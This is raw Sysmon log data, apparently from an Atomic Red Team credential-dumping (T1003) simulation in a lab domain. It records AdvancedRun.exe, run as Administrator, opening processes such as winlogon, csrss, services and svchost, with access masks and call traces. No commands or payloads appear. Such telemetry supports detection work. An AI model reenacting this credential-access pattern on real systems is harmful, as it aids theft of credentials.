17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 734700x80000000000000003943910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
